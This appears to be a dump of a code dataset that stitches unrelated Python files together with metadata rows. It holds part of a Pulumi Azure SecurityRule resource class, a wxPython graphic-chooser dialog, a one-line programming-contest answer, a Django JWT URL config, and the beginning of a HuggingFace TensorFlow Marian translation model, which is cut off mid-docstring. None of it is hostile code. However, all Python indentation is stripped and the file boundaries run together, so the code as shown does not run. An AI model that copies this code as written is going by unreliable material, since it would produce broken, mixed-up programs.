:param pulumi.Input[str] source_address_prefix: The CIDR or source IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used. If this is an ingress rule, specifies where network traffic originates from.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_address_prefixes: The CIDR or source IP ranges.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationSecurityGroupArgs']]]] source_application_security_groups: The application security group specified as source.
:param pulumi.Input[str] source_port_range: The source port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_port_ranges: The source port ranges.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if access is None:
raise TypeError("Missing required property 'access'")
__props__['access'] = access
__props__['description'] = description
__props__['destination_address_prefix'] = destination_address_prefix
__props__['destination_address_prefixes'] = destination_address_prefixes
__props__['destination_application_security_groups'] = destination_application_security_groups
__props__['destination_port_range'] = destination_port_range
__props__['destination_port_ranges'] = destination_port_ranges
if direction is None:
raise TypeError("Missing required property 'direction'")
__props__['direction'] = direction
__props__['etag'] = etag
__props__['id'] = id
__props__['name'] = name
if network_security_group_name is None:
raise TypeError("Missing required property 'network_security_group_name'")
__props__['network_security_group_name'] = network_security_group_name
__props__['priority'] = priority
if protocol is None:
raise TypeError("Missing required property 'protocol'")
__props__['protocol'] = protocol
__props__['provisioning_state'] = provisioning_state
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
if security_rule_name is None:
raise TypeError("Missing required property 'security_rule_name'")
__props__['security_rule_name'] = security_rule_name
__props__['source_address_prefix'] = source_address_prefix
__props__['source_address_prefixes'] = source_address_prefixes
__props__['source_application_security_groups'] = source_application_security_groups
__props__['source_port_range'] = source_port_range
__props__['source_port_ranges'] = source_port_ranges
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/latest:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20150501preview:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20150615:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20160330:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20160601:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20160901:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20161201:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20170301:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20170601:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20170801:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20170901:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20171001:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20171101:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180101:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180401:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180601:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180701:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180801:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20181001:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20181101:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20181201:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190201:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190401:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190601:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190701:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190801:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190901:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20191101:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20191201:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20200301:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20200401:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20200501:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20200601:SecurityRule")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(SecurityRule, __self__).__init__(
'azure-nextgen:network/v20180201:SecurityRule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'SecurityRule':
"""
Get an existing SecurityRule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return SecurityRule(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def access(self) -> pulumi.Output[str]:
"""
The network traffic is allowed or denied. Possible values are: 'Allow' and 'Deny'.
"""
return pulumi.get(self, "access")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A description for this rule. Restricted to 140 chars.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="destinationAddressPrefix")
def destination_address_prefix(self) -> pulumi.Output[Optional[str]]:
"""
The destination address prefix. CIDR or destination IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used.
"""
return pulumi.get(self, "destination_address_prefix")
@property
@pulumi.getter(name="destinationAddressPrefixes")
def destination_address_prefixes(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The destination address prefixes. CIDR or destination IP ranges.
"""
return pulumi.get(self, "destination_address_prefixes")
@property
@pulumi.getter(name="destinationApplicationSecurityGroups")
def destination_application_security_groups(self) -> pulumi.Output[Optional[Sequence['outputs.ApplicationSecurityGroupResponse']]]:
"""
The application security group specified as destination.
"""
return pulumi.get(self, "destination_application_security_groups")
@property
@pulumi.getter(name="destinationPortRange")
def destination_port_range(self) -> pulumi.Output[Optional[str]]:
"""
The destination port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
"""
return pulumi.get(self, "destination_port_range")
@property
@pulumi.getter(name="destinationPortRanges")
def destination_port_ranges(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The destination port ranges.
"""
return pulumi.get(self, "destination_port_ranges")
@property
@pulumi.getter
def direction(self) -> pulumi.Output[str]:
"""
The direction of the rule. The direction specifies if rule will be evaluated on incoming or outgoing traffic. Possible values are: 'Inbound' and 'Outbound'.
"""
return pulumi.get(self, "direction")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[Optional[str]]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def name(self) -> pulumi.Output[Optional[str]]:
"""
The name of the resource that is unique within a resource group. This name can be used to access the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def priority(self) -> pulumi.Output[Optional[int]]:
"""
The priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule.
"""
return pulumi.get(self, "priority")
@property
@pulumi.getter
def protocol(self) -> pulumi.Output[str]:
"""
Network protocol this rule applies to. Possible values are 'Tcp', 'Udp', and '*'.
"""
return pulumi.get(self, "protocol")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[Optional[str]]:
"""
The provisioning state of the public IP resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="sourceAddressPrefix")
def source_address_prefix(self) -> pulumi.Output[Optional[str]]:
"""
The CIDR or source IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used. If this is an ingress rule, specifies where network traffic originates from.
"""
return pulumi.get(self, "source_address_prefix")
@property
@pulumi.getter(name="sourceAddressPrefixes")
def source_address_prefixes(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The CIDR or source IP ranges.
"""
return pulumi.get(self, "source_address_prefixes")
@property
@pulumi.getter(name="sourceApplicationSecurityGroups")
def source_application_security_groups(self) -> pulumi.Output[Optional[Sequence['outputs.ApplicationSecurityGroupResponse']]]:
"""
The application security group specified as source.
"""
return pulumi.get(self, "source_application_security_groups")
@property
@pulumi.getter(name="sourcePortRange")
def source_port_range(self) -> pulumi.Output[Optional[str]]:
"""
The source port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
"""
return pulumi.get(self, "source_port_range")
@property
@pulumi.getter(name="sourcePortRanges")
def source_port_ranges(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The source port ranges.
"""
return pulumi.get(self, "source_port_ranges")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| [
"[email protected]"
] | |
86106338bded9ea79b22a0ead788c9f19d612858 | d227fb26e33128afe868bef60e3042f7c6576643 | /editor/Welder/src/Core/Database/Dialogs/ChooseGraphic_Dialog.py | fe49fe21d0ebcf6b5fedbd48ed36524feb53e61d | [] | no_license | boisei0/arcreator | 1e57b9cc61d5b38bfd0d62237592cfd9f371eca9 | 555739cafdeeed19d3c25c4948416a6ecb7697d5 | refs/heads/master | 2020-12-02T05:02:36.242572 | 2014-08-05T19:25:41 | 2014-08-05T19:25:41 | 22,642,617 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,223 | py | import os
import wx
import PIL
from Boot import WelderImport
Kernel = WelderImport('Kernel')
Core = WelderImport('Core')
Templates = Core.Database.Welder_Templates
RTPFunctions = Core.Cache.RTPFunctions
PILCache = Core.Cache.PILCache
class ChooseGraphic_Dialog( Templates.ChooseGraphic_Dialog ):
def __init__( self, parent, folder, current, hue ):
Templates.ChooseGraphic_Dialog.__init__( self, parent )
self.glCanvasGraphic.canvas.Bind(wx.EVT_LEFT_DOWN,
Kernel.Protect(self.glCanvas_LeftMouse))
#self.Centre( wx.BOTH )
self.glCanvasGraphic.SetDrawMode(5)
self.ImageList = ['(None)']
self.ImageList.extend(RTPFunctions.GetFileList(os.path.join('Graphics', folder)))
self.ImageIndex = 0
if folder == 'Characters': self.cache = PILCache.Character
elif folder == 'Battlers': self.cache = PILCache.Battler
# TODO: Implement the rest...
if current in self.ImageList:
self.ImageIndex = self.ImageList.index(current)
self.listBoxGraphics.AppendItems(self.ImageList)
self.listBoxGraphics.SetSelection(self.ImageIndex)
self.sliderHue.SetValue(hue)
self.RefreshCanvas()
def RefreshCanvas( self ):
if self.ImageIndex == 0:
image = PIL.Image.new('RGBA', (32, 32))
else:
filename = self.ImageList[self.ImageIndex]
hue = self.sliderHue.GetValue()
image = self.cache(filename, hue)
self.glCanvasGraphic.ChangeImage(image)
del (image)
def glCanvas_LeftMouse( self, event ):
print 'LEFT DOWN'
def listBoxGraphics_SelectionChanged( self, event ):
"""Changes the image index and refreshes the canvas"""
self.ImageIndex = event.GetSelection()
self.RefreshCanvas()
def sliderHue_Scrolled( self, event ):
"""Refreshes the canvas and redraws with the selected hue rotation"""
self.RefreshCanvas()
PILCache.CacheLimit()
def GetSelection( self ):
"""Returns the filename and hue that was selected by the user"""
if self.ImageIndex == 0:
return 0, 0
return self.ImageList[self.ImageIndex], self.sliderHue.GetValue()
def buttonOK_Clicked( self, event ):
"""End the dialog and return wx.ID_OK"""
self.EndModal(wx.ID_OK)
def buttonCancel_Clicked( self, event ):
"""End the dialog and return wx.ID_CANCEL"""
self.EndModal(wx.ID_CANCEL)
| [
"[email protected]"
] | |
d9eae03071430ffe4305fbd6afc9dc79c2905f78 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03795/s062323227.py | 74243f5eea190a8c47dde198e5a4b21d6edf84c9 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 50 | py | N = int(input())
print(int(800*N-200*(N-N%15)/15)) | [
"[email protected]"
] | |
c3d2c4d91f89382b08790e31e8951c7bb047b615 | c369443df5ff98eccc0eee7f63bb8947f2943605 | /api_shop/urls.py | faef15fce178629654a49b9494cf03b6b004d406 | [] | no_license | erllan/shop-test | d2934f484b25d141a60caa5aca31a61eec48f055 | 1f77de177192ce6a1f8c5ccf1d7ca93ec026acf5 | refs/heads/master | 2023-03-06T01:04:38.785383 | 2021-02-27T18:02:07 | 2021-02-27T18:02:07 | 341,929,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | from django.urls import path
from rest_framework_simplejwt import views as jwt_views
from . import views
urlpatterns = [
path('token/', jwt_views.TokenObtainPairView.as_view(), name='api.get_token'),
path('token/refresh/', jwt_views.TokenRefreshView.as_view(), name='api.token_refresh'),
path('user/change/', views.UserChange.as_view(), name='api-change'),
path('user/create/', views.UserCreate.as_view(), name='api-create')
]
| [
"[email protected]"
] | |
f611ff278e26d20dff934778c3c730b2b4e310bf | e8a48749014f372633de65d79bfa26a3ad743d89 | /src/transformers/models/marian/modeling_tf_marian.py | d356b4f8424008f518c2100b56668730cd548012 | [
"Apache-2.0"
] | permissive | pvcastro/pytorch-pretrained-BERT | 183b7291972c8d8c66c995647df66c1fe439a763 | 49cd736a288a315d741e5c337790effa4c9fa689 | refs/heads/master | 2022-08-19T08:55:16.332585 | 2022-06-30T16:11:08 | 2022-06-30T16:11:08 | 168,367,637 | 1 | 0 | Apache-2.0 | 2019-01-30T15:39:42 | 2019-01-30T15:39:41 | null | UTF-8 | Python | false | false | 67,868 | py | # coding=utf-8
# Copyright 2021 The Marian Team Authors and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" TF 2.0 Marian model."""
import random
from typing import Optional, Tuple, Union
import numpy as np
import tensorflow as tf
from ...activations_tf import get_tf_activation
from ...modeling_tf_outputs import (
TFBaseModelOutput,
TFBaseModelOutputWithPastAndCrossAttentions,
TFSeq2SeqLMOutput,
TFSeq2SeqModelOutput,
)
# Public API
from ...modeling_tf_utils import (
DUMMY_INPUTS,
TFCausalLanguageModelingLoss,
TFPreTrainedModel,
TFSharedEmbeddings,
TFWrappedEmbeddings,
keras_serializable,
unpack_inputs,
)
from ...tf_utils import shape_list, stable_softmax
from ...utils import (
add_code_sample_docstrings,
add_end_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
logging,
replace_return_docstrings,
)
from .configuration_marian import MarianConfig
logger = logging.get_logger(__name__)
_CHECKPOINT_FOR_DOC = "Helsinki-NLP/opus-mt-en-de"
_CONFIG_FOR_DOC = "MarianConfig"
_TOKENIZER_FOR_DOC = "MarianTokenizer"
LARGE_NEGATIVE = -1e8
# Copied from transformers.models.bart.modeling_tf_bart.shift_tokens_right
def shift_tokens_right(input_ids: tf.Tensor, pad_token_id: int, decoder_start_token_id: int):
pad_token_id = tf.cast(pad_token_id, input_ids.dtype)
decoder_start_token_id = tf.cast(decoder_start_token_id, input_ids.dtype)
start_tokens = tf.fill((shape_list(input_ids)[0], 1), decoder_start_token_id)
shifted_input_ids = tf.concat([start_tokens, input_ids[:, :-1]], -1)
# replace possible -100 values in labels by `pad_token_id`
shifted_input_ids = tf.where(
shifted_input_ids == -100, tf.fill(shape_list(shifted_input_ids), pad_token_id), shifted_input_ids
)
if tf.executing_eagerly():
# "Verify that `labels` has only positive values and -100"
assert_gte0 = tf.debugging.assert_greater_equal(shifted_input_ids, tf.constant(0, dtype=input_ids.dtype))
# Make sure the assertion op is called by wrapping the result in an identity no-op
with tf.control_dependencies([assert_gte0]):
shifted_input_ids = tf.identity(shifted_input_ids)
return shifted_input_ids
# Copied from transformers.models.bart.modeling_tf_bart._make_causal_mask
def _make_causal_mask(input_ids_shape: tf.TensorShape, past_key_values_length: int = 0):
"""
Make causal mask used for bi-directional self-attention.
"""
bsz = input_ids_shape[0]
tgt_len = input_ids_shape[1]
mask = tf.ones((tgt_len, tgt_len)) * LARGE_NEGATIVE
mask_cond = tf.range(shape_list(mask)[-1])
mask = tf.where(mask_cond < tf.reshape(mask_cond + 1, (shape_list(mask)[-1], 1)), 0.0, mask)
if past_key_values_length > 0:
mask = tf.concat([tf.zeros((tgt_len, past_key_values_length)), mask], axis=-1)
return tf.tile(mask[None, None, :, :], (bsz, 1, 1, 1))
# Copied from transformers.models.bart.modeling_tf_bart._expand_mask
def _expand_mask(mask: tf.Tensor, tgt_len: Optional[int] = None):
"""
Expands attention_mask from `[bsz, seq_len]` to `[bsz, 1, tgt_seq_len, src_seq_len]`.
"""
src_len = shape_list(mask)[1]
tgt_len = tgt_len if tgt_len is not None else src_len
one_cst = tf.constant(1.0)
mask = tf.cast(mask, dtype=one_cst.dtype)
expanded_mask = tf.tile(mask[:, None, None, :], (1, 1, tgt_len, 1))
return (one_cst - expanded_mask) * LARGE_NEGATIVE
class TFMarianSinusoidalPositionalEmbedding(tf.keras.layers.Layer):
"""This module produces sinusoidal positional embeddings of any length."""
def __init__(self, num_positions: int, embedding_dim: int, **kwargs):
super().__init__(**kwargs)
if embedding_dim % 2 != 0:
raise NotImplementedError(f"odd embedding_dim {embedding_dim} not supported")
self.embedding_dim = embedding_dim
self.num_positions = num_positions
def build(self, input_shape: tf.TensorShape):
"""
Build shared token embedding layer Shared weights logic adapted from
https://github.com/tensorflow/models/blob/a009f4fb9d2fc4949e32192a944688925ef78659/official/transformer/v2/embedding_layer.py#L24
"""
weight = self._init_weight(self.num_positions, self.embedding_dim)
self.weight = self.add_weight(
name="embeddings",
shape=[self.num_positions, self.embedding_dim],
)
weight = tf.cast(weight, dtype=self.weight.dtype)
self.weight.assign(weight)
super().build(input_shape)
@staticmethod
def _init_weight(n_pos: int, dim: int):
"""
Identical to the XLM create_sinusoidal_embeddings except features are not interleaved. The cos features are in
the 2nd half of the vector. [dim // 2:]
"""
position_enc = np.array(
[[pos / np.power(10000, 2 * (j // 2) / dim) for j in range(dim)] for pos in range(n_pos)]
)
table = np.zeros_like(position_enc)
# index 0 is all zero
table[:, 0 : dim // 2] = np.sin(position_enc[:, 0::2])
table[:, dim // 2 :] = np.cos(position_enc[:, 1::2])
# convert to tensor
table = tf.convert_to_tensor(table)
tf.stop_gradient(table)
return table
def call(
self, input_shape: tf.TensorShape, past_key_values_length: int = 0, position_ids: Optional[tf.Tensor] = None
):
"""Input is expected to be of size [bsz x seqlen]."""
if position_ids is None:
seq_len = input_shape[1]
position_ids = tf.range(past_key_values_length, seq_len + past_key_values_length, delta=1, name="range")
return tf.gather(self.weight, position_ids)
# Copied from transformers.models.bart.modeling_tf_bart.TFBartAttention with Bart->Marian
class TFMarianAttention(tf.keras.layers.Layer):
"""Multi-headed attention from "Attention Is All You Need"""
def __init__(
self,
embed_dim: int,
num_heads: int,
dropout: float = 0.0,
is_decoder: bool = False,
bias: bool = True,
**kwargs,
):
super().__init__(**kwargs)
self.embed_dim = embed_dim
self.num_heads = num_heads
self.dropout = tf.keras.layers.Dropout(dropout)
self.head_dim = embed_dim // num_heads
if (self.head_dim * num_heads) != self.embed_dim:
raise ValueError(
f"embed_dim must be divisible by num_heads (got `embed_dim`: {self.embed_dim}"
f" and `num_heads`: {num_heads})."
)
self.scaling = self.head_dim**-0.5
self.is_decoder = is_decoder
self.k_proj = tf.keras.layers.Dense(embed_dim, use_bias=bias, name="k_proj")
self.q_proj = tf.keras.layers.Dense(embed_dim, use_bias=bias, name="q_proj")
self.v_proj = tf.keras.layers.Dense(embed_dim, use_bias=bias, name="v_proj")
self.out_proj = tf.keras.layers.Dense(embed_dim, use_bias=bias, name="out_proj")
def _shape(self, tensor: tf.Tensor, seq_len: int, bsz: int):
return tf.transpose(tf.reshape(tensor, (bsz, seq_len, self.num_heads, self.head_dim)), (0, 2, 1, 3))
def call(
self,
hidden_states: tf.Tensor,
key_value_states: Optional[tf.Tensor] = None,
past_key_value: Optional[Tuple[Tuple[tf.Tensor]]] = None,
attention_mask: Optional[tf.Tensor] = None,
layer_head_mask: Optional[tf.Tensor] = None,
training: Optional[bool] = False,
) -> Tuple[tf.Tensor, Optional[tf.Tensor]]:
"""Input shape: Batch x Time x Channel"""
# if key_value_states are provided this layer is used as a cross-attention layer
# for the decoder
is_cross_attention = key_value_states is not None
bsz, tgt_len, embed_dim = shape_list(hidden_states)
# get query proj
query_states = self.q_proj(hidden_states) * self.scaling
# get key, value proj
if is_cross_attention and past_key_value is not None:
# reuse k,v, cross_attentions
key_states = past_key_value[0]
value_states = past_key_value[1]
elif is_cross_attention:
# cross_attentions
key_states = self._shape(self.k_proj(key_value_states), -1, bsz)
value_states = self._shape(self.v_proj(key_value_states), -1, bsz)
elif past_key_value is not None:
# reuse k, v, self_attention
key_states = self._shape(self.k_proj(hidden_states), -1, bsz)
value_states = self._shape(self.v_proj(hidden_states), -1, bsz)
key_states = tf.concat([past_key_value[0], key_states], axis=2)
value_states = tf.concat([past_key_value[1], value_states], axis=2)
else:
# self_attention
key_states = self._shape(self.k_proj(hidden_states), -1, bsz)
value_states = self._shape(self.v_proj(hidden_states), -1, bsz)
if self.is_decoder:
# if cross_attention save Tuple(tf.Tensor, tf.Tensor) of all cross attention key/value_states.
# Further calls to cross_attention layer can then reuse all cross-attention
# key/value_states (first "if" case)
# if uni-directional self-attention (decoder) save Tuple(tf.Tensor, tf.Tensor) of
# all previous decoder key/value_states. Further calls to uni-directional self-attention
# can concat previous decoder key/value_states to current projected key/value_states (third "elif" case)
# if encoder bi-directional self-attention `past_key_value` is always `None`
past_key_value = (key_states, value_states)
proj_shape = (bsz * self.num_heads, -1, self.head_dim)
query_states = tf.reshape(self._shape(query_states, tgt_len, bsz), proj_shape)
key_states = tf.reshape(key_states, proj_shape)
value_states = tf.reshape(value_states, proj_shape)
src_len = shape_list(key_states)[1]
attn_weights = tf.matmul(query_states, key_states, transpose_b=True)
# The tf.debugging asserts are not compliant with XLA then they
# have to be disabled in other modes than eager.
if tf.executing_eagerly():
tf.debugging.assert_equal(
shape_list(attn_weights),
[bsz * self.num_heads, tgt_len, src_len],
message=(
f"Attention weights should be of size {(bsz * self.num_heads, tgt_len, src_len)}, but is"
f" {shape_list(attn_weights)}"
),
)
if attention_mask is not None:
# The tf.debugging asserts are not compliant with XLA then they
# have to be disabled in other modes than eager.
if tf.executing_eagerly():
tf.debugging.assert_equal(
shape_list(attention_mask),
[bsz, 1, tgt_len, src_len],
message=(
f"Attention mask should be of size {(bsz, 1, tgt_len, src_len)}, but is"
f" {shape_list(attention_mask)}"
),
)
attention_mask = tf.cast(attention_mask, dtype=attn_weights.dtype)
attn_weights = tf.reshape(attn_weights, (bsz, self.num_heads, tgt_len, src_len)) + attention_mask
attn_weights = tf.reshape(attn_weights, (bsz * self.num_heads, tgt_len, src_len))
attn_weights = stable_softmax(attn_weights, axis=-1)
if layer_head_mask is not None:
# The tf.debugging asserts are not compliant with XLA then they
# have to be disabled in other modes than eager.
if tf.executing_eagerly():
tf.debugging.assert_equal(
shape_list(layer_head_mask),
[self.num_heads],
message=(
f"Head mask for a single layer should be of size {(self.num_heads)}, but is"
f" {shape_list(layer_head_mask)}"
),
)
attn_weights = tf.reshape(layer_head_mask, (1, -1, 1, 1)) * tf.reshape(
attn_weights, (bsz, self.num_heads, tgt_len, src_len)
)
attn_weights = tf.reshape(attn_weights, (bsz * self.num_heads, tgt_len, src_len))
attn_probs = self.dropout(attn_weights, training=training)
attn_output = tf.matmul(attn_probs, value_states)
# The tf.debugging asserts are not compliant with XLA then they
# have to be disabled in other modes than eager.
if tf.executing_eagerly():
tf.debugging.assert_equal(
shape_list(attn_output),
[bsz * self.num_heads, tgt_len, self.head_dim],
message=(
f"`attn_output` should be of size {(bsz, self.num_heads, tgt_len, self.head_dim)}, but is"
f" {shape_list(attn_output)}"
),
)
attn_output = tf.transpose(
tf.reshape(attn_output, (bsz, self.num_heads, tgt_len, self.head_dim)), (0, 2, 1, 3)
)
attn_output = tf.reshape(attn_output, (bsz, tgt_len, embed_dim))
attn_output = self.out_proj(attn_output)
attn_weights: tf.Tensor = tf.reshape(attn_weights, (bsz, self.num_heads, tgt_len, src_len))
return attn_output, attn_weights, past_key_value
# Copied from transformers.models.bart.modeling_tf_bart.TFBartEncoderLayer with Bart->Marian
class TFMarianEncoderLayer(tf.keras.layers.Layer):
def __init__(self, config: MarianConfig, **kwargs):
super().__init__(**kwargs)
self.embed_dim = config.d_model
self.self_attn = TFMarianAttention(
self.embed_dim, config.encoder_attention_heads, dropout=config.attention_dropout, name="self_attn"
)
self.self_attn_layer_norm = tf.keras.layers.LayerNormalization(epsilon=1e-5, name="self_attn_layer_norm")
self.dropout = tf.keras.layers.Dropout(config.dropout)
self.activation_fn = get_tf_activation(config.activation_function)
self.activation_dropout = tf.keras.layers.Dropout(config.activation_dropout)
self.fc1 = tf.keras.layers.Dense(config.encoder_ffn_dim, name="fc1")
self.fc2 = tf.keras.layers.Dense(self.embed_dim, name="fc2")
self.final_layer_norm = tf.keras.layers.LayerNormalization(epsilon=1e-5, name="final_layer_norm")
def call(
self,
hidden_states: tf.Tensor,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]],
layer_head_mask: Optional[tf.Tensor],
training: Optional[bool] = False,
) -> tf.Tensor:
"""
Args:
hidden_states (`tf.Tensor`): input to the layer of shape `(seq_len, batch, embed_dim)`
attention_mask (`tf.Tensor`): attention mask of size
`(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.
layer_head_mask (`tf.Tensor`): mask for attention heads in a given layer of size
`(encoder_attention_heads,)`
"""
residual = hidden_states
hidden_states, self_attn_weights, _ = self.self_attn(
hidden_states=hidden_states, attention_mask=attention_mask, layer_head_mask=layer_head_mask
)
# The tf.debugging asserts are not compliant with XLA then they
# have to be disabled in other modes than eager.
if tf.executing_eagerly():
tf.debugging.assert_equal(
shape_list(hidden_states),
shape_list(residual),
message=f"Self attn modified the shape of query {shape_list(residual)} to {shape_list(hidden_states)}",
)
hidden_states = self.dropout(hidden_states, training=training)
hidden_states = residual + hidden_states
hidden_states = self.self_attn_layer_norm(hidden_states)
residual = hidden_states
hidden_states = self.activation_fn(self.fc1(hidden_states))
hidden_states = self.activation_dropout(hidden_states, training=training)
hidden_states = self.fc2(hidden_states)
hidden_states = self.dropout(hidden_states, training=training)
hidden_states = residual + hidden_states
hidden_states = self.final_layer_norm(hidden_states)
return hidden_states, self_attn_weights
# Copied from transformers.models.bart.modeling_tf_bart.TFBartDecoderLayer with Bart->Marian
class TFMarianDecoderLayer(tf.keras.layers.Layer):
def __init__(self, config: MarianConfig, **kwargs):
super().__init__(**kwargs)
self.embed_dim = config.d_model
self.self_attn = TFMarianAttention(
embed_dim=self.embed_dim,
num_heads=config.decoder_attention_heads,
dropout=config.attention_dropout,
name="self_attn",
is_decoder=True,
)
self.dropout = tf.keras.layers.Dropout(config.dropout)
self.activation_fn = get_tf_activation(config.activation_function)
self.activation_dropout = tf.keras.layers.Dropout(config.activation_dropout)
self.self_attn_layer_norm = tf.keras.layers.LayerNormalization(epsilon=1e-5, name="self_attn_layer_norm")
self.encoder_attn = TFMarianAttention(
self.embed_dim,
config.decoder_attention_heads,
dropout=config.attention_dropout,
name="encoder_attn",
is_decoder=True,
)
self.encoder_attn_layer_norm = tf.keras.layers.LayerNormalization(epsilon=1e-5, name="encoder_attn_layer_norm")
self.fc1 = tf.keras.layers.Dense(config.decoder_ffn_dim, name="fc1")
self.fc2 = tf.keras.layers.Dense(self.embed_dim, name="fc2")
self.final_layer_norm = tf.keras.layers.LayerNormalization(epsilon=1e-5, name="final_layer_norm")
def call(
self,
hidden_states: tf.Tensor,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
encoder_hidden_states: Optional[Union[np.ndarray, tf.Tensor]] = None,
encoder_attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
layer_head_mask: Optional[tf.Tensor] = None,
cross_attn_layer_head_mask: Optional[tf.Tensor] = None,
past_key_value: Optional[Tuple[Tuple[Union[np.ndarray, tf.Tensor]]]] = None,
training: Optional[bool] = False,
) -> Tuple[tf.Tensor, tf.Tensor, Tuple[Tuple[tf.Tensor]]]:
"""
Args:
hidden_states (`tf.Tensor`): input to the layer of shape `(seq_len, batch, embed_dim)`
attention_mask (`tf.Tensor`): attention mask of size
`(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.
encoder_hidden_states (`tf.Tensor`):
